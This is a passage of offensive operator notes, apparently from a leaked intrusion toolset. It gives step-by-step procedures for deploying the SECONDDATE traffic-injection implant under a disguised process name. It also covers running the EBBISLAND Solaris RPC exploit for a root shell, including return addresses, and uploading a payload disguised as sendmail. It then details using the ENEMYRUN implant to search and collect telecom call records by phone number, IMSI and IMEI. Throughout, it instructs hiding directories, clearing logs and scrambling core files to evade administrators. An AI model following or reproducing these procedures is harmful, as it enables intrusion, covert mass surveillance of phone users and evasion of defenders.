connection (see connection close in your ### Window 1 -tunnel window). ### Note that there will be another log entry put into ### wtmp that cannot be toasted away, should not be seen by admins though... EOF ### ### END File user.tool.poptop.COMMON ### (see also ../etc/user.tool.poptop.COMMON) ### ### BEGIN File user.tool.seconddate.COMMON (see also ../etc/user.tool.seconddate.COMMON) ### # SECONDDATE :syntax on ######### # SET UP ######### # get tasking directories and put them on media # check op plan for correct tasking date /projects/web_proxy_tasking/to_lowside/YYYYMMDD/YYYYMMDD.HH.MM.SS-IP_ADDRESS # copy and extract binaries to /current/bin mz cp /mnt/zip/seconddate_tools.tar /current/bin cd /current/bin tar xvf /seconddate_binaries.tar # copy tasking directories to /current/bin/sd and extract cp -r /mnt/zip/TASKING /current/bin/sd cd /current/bin/sd # copy the SECONDDATE command and control binary to each tasking directory # the rules are set by relative path; # the command and control binary needs to be in the same path as the inject and regex files # tasking directory name format: YYYYMMDD.HH.MM.SS-IP_ADDRESS # inject tag name format: YYYYMMDDHHMMSS-IP_ADDRESS-inject-.bin # regex file name format: YYYYMMDDHHMMSS-IP_ADDRESS-regex-.bin cp /current/bin/sd/1.1.1.1/Binaries/Seconddate_CnC /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS ################# # PREP COMMANDS ################# # all commands to run at local Seconddate_CnC prompt are in commands.txt # you should have already copied it here: # /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS/commands.txt cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS egrep "disable" commands.txt > disable.txt egrep "rule" commands.txt | egrep -v "showrule --all" > rules.txt egrep "enable" commands.txt > enable.txt # open command files in gedit text editor; xemacs works too; vi doesn't work gedit disable.txt & # open the other files rules.txt and enable.txt #################### # CONNECT TO IMPLANT ################### # local_port - listen on this port locally; i.e. the ops box; pick a random port # target_ip - ip of target that is running SECONDDATE to which you want to connect # target_port - port to which you'll connect to target; can be the same as local_port mx :%s/LOCAL_UDP_PORT/LOCAL_UDP_PORT/g :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_UDP_PORT/TARGET_UDP_PORT/g `x # set up UDP tunnel from redirector; won't work locally on target box # u -tunnel u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT # in locally scripted window # run CnC # ./Seconddate_CnC 127.0.0.1 cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS ./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT # run command ping # should recieve an 'OK' # if you can't get an OK, the target may have rebooted; tool only runs in memory # connect to the target via -irtun and check to see if SECONDDATE is running # if it's not running you need to deploy ps -ef | grep IMPLANT_FILENAME cd /dev; ps -ef | grep IMPLANT_FILENAME ############## # RUN COMMANDS ############# # help menu ? #or help # do these first ping # synopsis of rules and injects getinfo # check rule log getlog # show all rules showrule --all # have gedit window with rules commands available # if you still have gedit open with the commands files, go to the disable commands section below # if you closed it after setup, reopen the commands files with gedit # command files you previously set up are here including the commands.txt file: # /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS # open command files in gedit text editor; xemacs works too; vi doesn't work cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS gedit disable.txt & # open the other files rules.txt and enable.txt from within gedit # run disable commands only for enabled rules you know are going to change # otherwise, disable all of the rules # disable commands are in the file disable.txt # clear log only if instructed to do so # will fail if any rules are enabled clearlog # set rules; make sure the rules in rules.txt match what is on target # rule commands are in the file rules.txt # enable rules; watch for "Enabled: yes" in each rule displayed # enable commands are in the file enable.txt # show all rules showrule --all # check for empty rule enabled: getinfo # if the matches/hits/injects are increasing rapidly, then you probably enabled an empty rule # find the emtpy rule that's enabled getlog # look for the rule that has the most hits # disable it and display it with showrule # done exit # copy script files # when finished with locally scripted window, type exit, or type CTL-D only once # this reveals the name of the script file cp script. script..seconddate.log # you can remove the original script if you like ######### # DEPLOY ######### # if the target box rebooted, you'll have to deploy the tool # connect via -irtun # hidden_dir - hidden directoy on the target # INCISION targets will have a manually created hidden directory # STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory # sd_binary _path - where the SECONDATE binaries are lcoated on the ops box: # /current/bin/sd/1.1.1.1/Binaries # implant_filename - what you want to call the SECONDDATE binary on target mx :%s:HIDDEN_DIR:HIDDEN_DIR:g :%s/SD_BINARY_PATH/SD_BINARY_PATH/g :%s/IMPLANT_FILENAME/IMPLANT_FILENAME/g `x # INCISION targets; skip if STOICSURGEON # create hidden directory on linux target if you don't have one already # mkdir -p /tmp/.; __HMODE__=enable touch /tmp/. # try to use a drectory name that blends in on teh target # example: # mkdir -p /tmp/.orbit561; __HMODE__=enable touch /tmp/.orbit561 mkdir -p HIDDEN_DIR; __HMODE__=enable touch HIDDEN_DIR # make sure the directory was created -ls HIDDEN_DIR # make sure the directory is hidden # you should not see the hidden directory cd /dev; ls -al HIDDEN_DIR # cd to hidden directory # STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory # INCISION targets run from hidden directory # -cd /tmp/.orbit561 -cd HIDDEN_DIR # put up tool # -put # example # -put /current/bin/sd/1.1.1.1/Binaries/Seconddate_Implant crond -put SD_BINARY_PATH IMPLANT_FILENAME ################## # START SECONDDATE ################## # look for setsid which setsid # or locate setsid # run: setsid /bin/bash -c 'PATH="." crond' > /dev/null 2>&1 & # or, if there's no setsid # -shell # PATH=. crond -shell PATH=. IMPLANT_FILENAME # Ctrl-D to get out of shell and get your NOPEN prompt # be careful # if there's no setsid, get noserver pid (parent of nopen pid) # you'll have to kill the root noserver later when getting off target # i.e. the parent pid of the nopen window you're in -pid # INCISION targets make sure it's hidden # annotate pid of running implant in your opnotes # cd /dev; ps -ef | grep crond cd /dev; ps -ef | grep IMPLANT_FILENAME # remove implant # -rm crond -rm IMPLANT_FILENAME # in locally scripted window # run CnC ./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT # help menu help # ping ping ############### # LEAVE RUNNING ############### # may want to leave implant running and come back later # if implant is left running exit from the CnC tool exit # check lastlog for reboot frequecy last -100 | egrep "hutdow|eboo" # INCISION targets make sure the running implant is hidden # cd /dev; ps -ef grep cd /dev; ps -ef grep IMPLANT_FILENAME ########### # UNINSTALL ########### # to stop running implant in preparation for leaving target box # in local CnC window that's scripted, uninstall the implant uninstall # in NOPEN window # check process list; make it's not hung; if hung, kill it kill -9 ########## # FINISHED ########## # getting ready to get off the target # to burn or not to burn? # read all lof the following before getting off target # if you're not leaving the implant running after getting off the target: # - make sure you uninstall the implant as stated above # - ensure it not hung; if so, kill it # - then burn # # if you're on target under a noserver that did not spawn the implant # process you may burn, i.e. the implant process is not the child # of the noserver process # # if you ran the implant using 'setsid', you may also burn: -burn # if you ran the implant under your present noserver and wish to leave it # running, you need to make sure the implant continues when done with target # if there was no 'setsid' on the target box when you ran the implant: # - kill the noserver that is listening under which you started the implant # if you burn in this case the implant process will be killed kill -9 # - use "-exit" to get out of all nopen windows -exit # check your connection to the implant from the redirector next to the # target running the implant # run a few commands ping getinfo # if connection is OK then you're done ping # should recieve an 'OK' # if you can't connect to the implant # get back up on target and check to see if implant is still running # if the implant is not running you may have missed something when running # the implant or disconnecting # put it back up and run it again # if you can't connect and the implant is running try troubleshooting # the ports you're using # copy script files # when finished with locally scripted window, CTL-D only once # this reveals the name of the script file cp script. script..seconddate.log # you can remove the original script if you like #/////////////////////////////// # TASKING BY HAND - THE OLD WAY #////////////////////////////// ############# # INJECT FILE ############# # configure inject file # you will need to have a file containing the data for the inject packet # first the http info: # then the tag followed by 2 carriage retruns # example HTTP/1.1 200 OK Pragma: no-cache Content-Type: text/html Cache-Control: no-cache,no-store ##################### # REGULAR EXPRESSIONS ##################### # regular expression file # needed to pass to implant as argument when using regex in a rule # can't have any carriage returns or newlines in the file # it must only contain the characters relative to the regex # use vi or echo: vi -b -c "set noeol" # or echo -n > ####### # RULES ####### # set rule # rule 1 --srcaddr --srcmask 255.255.255.0 --dstport 80 --maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt # examples: rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile --injectfile pkt rule 2 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile --injectfile pkt # showrule showrule 1 # to show all rules you'll have to wait a bit # the tool will iterate through all 64 whether emtpy or not # enable rule(s) # you have to enable them individually enable rule 1 # check for hits getinfo # check log getlog # when done disable rules disable 1 # get last dump of log getlog # clear log clearlog ### ### END File user.tool.seconddate.COMMON ### (see also ../etc/user.tool.seconddate.COMMON) ### ### BEGIN File user.tool.ebbisland.COMMON (see also ../etc/user.tool.ebbisland.COMMON) ### EBBISLAND (Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10) First ensure that the vulnerable rpc service(bootparam) is running. You must be able to reach the target system's TCP port that the designated target RPC is listening upon. Example $ rpcinfo -p program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100232 10 udp 32772 sadmind 100083 1 tcp 32771 100221 1 tcp 32772 100068 2 udp 32773 100068 3 udp 32773 100068 4 udp 32773 100249 1 tcp 32782 100026 1 udp 32800 bootparam 100026 1 tcp 32790 bootparam ********************************************************************************************** EBBISLAND USAGE. ebbisland: (-A
) Shellcode address ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack, but uses pseudo-random binary data in place of the actual shellcode, to produce a /core file free of suspicious content. This would be used in the case where EBBISLAND failed to successfully exploit the target, and the operator wanted to try and "purify" the file left in /core before quitting. ebbisland: (-c ) Procedure number. Defaults to 0. ebbisland: (-D) For and extra dummy connection ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd) ebbisland: (-M ) Choose size of data part of packet to send. Default is 1260. This could effect the landing zone size. ebbisland: (-P ) Optional prog to exec, re-using exploit socket. ebbisland: (-r ) RPC program number ebbisland: (-s ) ebbisland: (-V) Provides verbose outputs, where appropriate and desired. ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for others ******************************************************************************************* Table of Exploit addresses for rpc.bootparamd (SPARC) 100026 rpc.bootparamd 2.6 -X -N 0x641a0 100026 rpc.bootparamd 2.7 -X -N (earlier) 0x65798 100026 rpc.bootparamd 2.7 -X -N (earlier) 0x6d8d8 100026 rpc.bootparamd 2.8 -X -N 0x7c760 100026 rpc.bootparamd 2.9 -X -N 0x6e908 100026 rpc.bootparamd 2.10 -X -N 0x68318 ********************************************************************************************* Redirector: -tunnel l Example: l 32794 10.40.1.2 32790 Exploit: ./ebbisland -t -p -r -X -N -A Example against Solaris 2.9: ./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908 ********************************************************************************** Exploit will provide ROOT shell access. unset HISTSIZE unset HISTFILESIZE unset HISTFILE w pwd id which uudecode uncompress cd /tmp mkdir .scsi cd .scsi # locally packrat RAND_PORT # packrat command gedit /current/up/sendmail.Z.uu # Target /usr/bin/uudecode; ls -latr select all/copy gedit contents into Target exploit window uncompress sendmail.Z ls -l chmod 700 sendmail PATH=. sendmail # from redirector -nstun TARGET_IP (EnJOY) ******************************************************************************* CLEANING. * The correct EBBISLAND attack for the remote target architecture must be used, or else the attack will fail, and the chosen TCP RPC daemon will likely (1) abort and /core dump, and (2) log heavily. If this should occur, a /core file will be left on the remote system. This /core file will contain our attack data buffers, including "shellcode". The technique could then be reverse engineered and developed into an attack. That's why we have the '-C' option...please rerun the attack, and generate 1 more /core file, containing our semi-innocuous pseudo-random shellcode data. # Logging considerations: Quite a few log messages will be generated on the target as each subsequent attack attempt fails, most likely written to the /var/adm/messages file. These could include messages similar to... Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon attempting AP interaction Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_daemon: fatal: libap.so: open failed: No such file or directory Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon operating in NO AP interaction mode Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recovered old state file '/tmp/.dr_extra_info' Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped Sep 27 14:43:13 target last message repeated 1 time Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Illegal Instruction - core dumped Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/kcms_server: Segmentation Fault - core dumped Sep 27 14:43:17 target last message repeated 2 times Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Illegal Instruction - core dumped Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Bus Error - core dumped Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.metad: Segmentation Fault - core dumped ### ### END File user.tool.ebbisland.COMMON ### (see also ../etc/user.tool.ebbisland.COMMON) ### ### BEGIN File user.tool.enemyrun.COMMON (see also ../etc/user.tool.enemyrun.COMMON) ### ################## #### ENEMYRUN #### ################## ## copy and paste this into the window if you want syntax highlighting: ## it makes scripts a bit easier to read :syntax on ############## ## ER SETUP ## ############## ## ## only get an encryption key value, if you don't already have one, ask first ## #md5sum /current/down/tcpdump.raw ## ## vi Search/Replace commands: ## projectName - self explanatory, all CAPS ## date field - today's date, used for output files ## hostname.ip - hostname of the box and IP address exactly as displayed in nopen window title bar ## or as seen in /current/down ## cryptkey - encryption key (already have one, or use output from below md5sum command) ## mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOSTNAME.IP/HOSTNAME.IP/g :%s/CRYPTKEY/CRYPTKEY/g 'x ## ## copy the ER directory "er_PROJECTNAME" from the project's /targets//sustained directory ## to /current/down and make sure there are no tarballs in /current/down ## mz cp -r /mnt/zip/er_PROJECTNAME /current/down cd /current/down/er_PROJECTNAME uz ## ## save the encryption key locally in /current/down ## whether you have a new or old key: ## echo CRYPTKEY > /current/down/cryptkey.enemyrun.DDMonYY ## copy key to ER directory if creating a new key echo CRYPTKEY > /current/down/er_PROJECTNAME/cryptkey.enemyrun.DDMonYY ## ## implant hidden directory for script commnads ## location is implant dependent ## INCISION: ## Solaris - /platform/SUNW,SystemEngine/kernel/drv ## Linux - (hidden independently; check old opnotes) ## STOICSURGEON: (hidden directory is displayed at beginning of FTSHELL/ish callback) ## no trailing / ## mx :%s:IMPLANT_HIDDEN_DIRECTORY:IMPLANT_HIDDEN_DIRECTORY:g 'x ## ## prepare files containing numbers to search for: ## if files containing the numbers to search available: ## mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ## ## prep the argfiles: ## make sure the files are ASCII and contain NO EMPTY LINES!! ## make sure the last line does not contain a null character at the end ## (vi the file, add a carriage return to the last line, then delete the empty ## line and save) ## "file" results: ## this will not work: ASCII text, with CRLF line terminators ## this WILL: ASCII text ## cat arg* file arg* dos2unix arg* file arg* ## ## if no data media is provided: ## locally, create a file of numbers to grep for with each number on a separate line ## make sure there are NO EMPTY LINES!!!! ## Format of each type of argument: ## p123456789 - phone number ## s123456789 - IMSI ## e123456789 - IMEI ## c123/456 - Cell/LAC (no leading 0's) ## cd /current/down/argfiles vim /current/down/argfiles/argfile1.txt ## ## encrypt argfiles / target files ## ## encrypt the ascii list...first make sure you have the encryption tool: which cryptTool.v1.0.Linux2.4.18-14.targetdl ## if cryptTool not in PATH, change your PATH or insert full path in command ## to encrypt one at a time...skip to next comment to encrypt all at once: cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b ## to encrypt all at the same time: for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done ls -l file argfile*.enc ## ## on target look at CDR directories: ## - use the following commands to determine the location of current CDR data storage ## - once you identify the location of the data, you'll use the head/tail commands ## to determine the date ranges being saved ## - these date ranges will be used as settings in the ER configuration file(s) ## ## ## typical file locations per host: ## ######################### aromaseal: ######################### desertvista: -lt /var/archive/output_billing -vget /var/archive/output_billing/MoveData.sh ######################### diamondaxe: ########################## editionhaze: ## billing02 10.100.10.140 ls -latr /d08/saba/CDR/out/MS* | head -10 ls -latr /d08/saba/CDR/out/MS* | tail -10 ls -latr /d08/saba/CDR/out/MS* | wc -l ########################## liquidsteel: ########################## serenecosmos: ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10 ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10 ########################## sicklestar: ## magnum: CURSEHAPPY not working on all SS .usd files :-( ## Try these first, should be all of them in one spot ls -latr /usd_archive/mc_storage/*usd | head -10 ls -latr /usd_archive/mc_storage/*usd | tail -10 ## if none in previous ones... ls -latr /sys1/var/billing/out_coll/*usd | head -10 ls -latr /sys1/var/billing/out_coll/*usd | tail -10 ls -latr /sys1/var/alcatel/out_coll/*usd | head -10 ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10 ls -latr /sys1/var/billing/msc_is2 | tail -20 ######################### qualitygel: ########################## wholeblue: ## tpmw01 10.3.4.55 ## tpmw02 10.3.4.56 ## verifies isb, khi, and lhr directories: ls -ld /tp/med/datastore/collect/siemens_msc_* ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr ls -ld /tp/med/archive/collect/siemens_msc_* ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr ## shows oldest and newest files in directories: ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10 ## isbapro1 10.5.7.51 ## nothing new -lt /u01/product_evdp/evident/data_store/collect ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10 -lt /u03/archive/collect ## newer stuff ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l ## old stuff: ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10 ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10 ############# ## COLLECT ## ############# ## ## cd to hidden directory where ENEMYRUN is set up ## when in the hidden directory, there could be two subdirectories; ## one for a forward instance and one backward (e.g. erf and erb) ## -cd IMPLANT_HIDDEN_DIRECTORY ## ## there should be files in: ## er*/aux_*/output/final ## and possibly if parsing is occuring: ## er*/aux_*/output ## -ls -R er* -ls -R IMPLANT_HIDDEN_DIRECTORY/er* ## ## stop current instances on ENEMYRUN ## need name of process ENEMYRUN is running as on target; should be on plan, or check old opnotes ## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd which will look like ./nscd ## #ps -ef | grep ENEMYRUN_PROCESS_NAME ps -ef | grep nscd ## kill with SIGTERM; if it doesn't work use kill -9 ## ENEMYRUN_PID: process id under which ENEMYRUN is running on target kill -15 ENEMYRUN_PID ## ## collect parsed CDRs and logs created from the backward directory ## files are encrypted ## -get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/* -get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log* ## in a local window make sure you have them all: ls -laR /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er* ## ## clean ER directories ## ## remove parsed CDRs rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/* ## remove old logs rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log* ## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log -ls -R er* -ls -R IMPLANT_HIDDEN_DIRECTORY/er* ## ## edit ER configuration files ## ## in a local window cd /current/down/er_PROJECTNAME ## find ER configs ls -la er_conf*.txt ## should usually not have to edit the forward config, er_conf_fwd*.txt ## edit the backwards config, er_conf_bwd*.txt vi er_conf_bwd.txt ## probably have to change START_DAY and STOP_DAY ## START_DAY: YYYYMMDD # day backwards in time from which to start ## STOP_DAY: YYYYMMDD # day forwards from START_DAY: to stop ## make sure you've made date range changes, or any other changes, ## to the plaintext ER configuration files and save ## ## encrypt required ER files ## ## encrypt the ER backwards configuration file cd /current/down/er_PROJECTNAME cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b ## encrypt the ER forwards configuration file cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b file /current/down/er_PROJECTNAME/er_conf_*.enc ## --------------- ## ## BACKWARDS FILES ## ## --------------- ## ## ## put up encrypted files ## ## encrypted argfile(s) -put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1 ## copy adm1 for each aux_* directory you see ## e.g. if you see aux_1 aux_2 aux_3 then: ## cp adm1 adm2 ## cp adm1 adm3 ## encrypted ER configuration file -put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/ecb ## ## start ENEMYRUN ## may not work w/ PATH=. ## CRYPTKEY must be the same as in the ER configuration file ## -cd IMPLANT_HIDDEN_DIRECTORY/erb L='-I ecb -k CRYPTKEY'; export L; ./nscd #ps -ef | grep ENEMYRUN_PROCESS_NAME ps -ef | grep nscd ## record ER process pid(s) in opnotes ## DDMonYY ## backward ENEMYRUN_PROCESS_NAME ## pid: ps -ef | grep ENEMYRUN_PID ## the argfile(s) should no longer be in the erb directory after ER is running ## if the parser has started, these files should grow ## logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/Log.* ## hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/.* -ls -R erb -ls -R IMPLANT_HIDDEN_DIRECTORY/erb ## -------------- ## ## FORWARDS FILES ## ## -------------- ## ## ## put up encrypted files ## ## encrypted argfile(s) -put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1 ## or -put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1 ## copy adm1 for each aux_* directory you see ## e.g. if you see aux_1 aux_2 aux_3 then: ## cp adm1 adm2 ## cp adm1 adm3 ## encrypted ER configuration file -put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/ecf ## ## start ENEMYRUN ## may not work w/ PATH=. ## CRYPTKEY must be the same as in the ER configuration file ## -cd IMPLANT_HIDDEN_DIRECTORY/erf L='-I ecf -k CRYPTKEY'; export L; ./nscd #ps -ef | grep ENEMYRUN_PROCESS_NAME ps -ef | grep nscd ## record ER process pid(s) in opnotes ## DDMonYY ## forward ENEMYRUN_PROCESS_NAME ## pid: ER_PID ps -ef | grep ENEMYRUN_PID ## the argfile(s) should no longer be in the erb directory after ER is running ## if the parser has started, these files should grow ## logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/Log.* ## hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/.* -ls -R erf -ls -R IMPLANT_HIDDEN_DIRECTORY/erf ## ## once all required ER instances are running, you're done ## -cd /tmp -burnBURN ## ## decrypt parsed CDRs locally ## ## single aux* directory cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erb ## and/or cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done ## multiple aux* directories mkdir /current/down/coll cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /current/down/coll cd /current/down/coll for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done ## ## copy decrypted data to media / remove ER tar from /current/down ## ls -la *.txt mz cp *.txt /mnt/zip*/PROJECTNAME ls -la /mnt/zip*/PROJECTNAME uz rm /current/down/er_*.tar ############ ## DEPLOY ## ############ ## ## edit ER configuration files ## ## in a local window cd /current/down/er_PROJECTNAME ## find ER configs ls -la er_conf*.txt ## should not have to edit the forward config, er_conf_fwd*.txt ## edit the backwards config, er_conf_bwd*.txt vi er_conf_bwd.txt ## make sure you've made date range changes, or any other changes, ## to the plaintext ER configuration files ## ## encrypt required ER files ## ## encrypt the ER backwards configuration file cd /current/down/er_PROJECTNAME cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b ## encrypt the ER forwards configuration file cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b file /current/down/er_PROJECTNAME/er_conf_*.enc ## encrypt CURSEHAPPY definition file if using CURSEHAPPY for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done ls -la file /current/up/cursedefs/*.enc ## ## put up directories and tools only if deploying ENEMYRUN ## this means only put up these files/tools if they are not on the target yet ## if you have the least doubt about what you're doing, find someone who knows ## ## --------------- ## ## BACKWARDS FILES ## ## --------------- ## -put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar tar xvf erb.tar -cd IMPLANT_HIDDEN_DIRECTORY/erb -ls -R ## put up applicable parser(s) -put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond -put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond -put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond -put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond -put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond ## encrypted CURSEHAPPY definition file -put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd ## put up enemyrun -put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/nscd ## if everything looks good remove tar -rm IMPLANT_HIDDEN_DIRECTORY/erb.tar ## -------------- ## ## FORWARDS FILES ## ## -------------- ## -put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar tar xvf 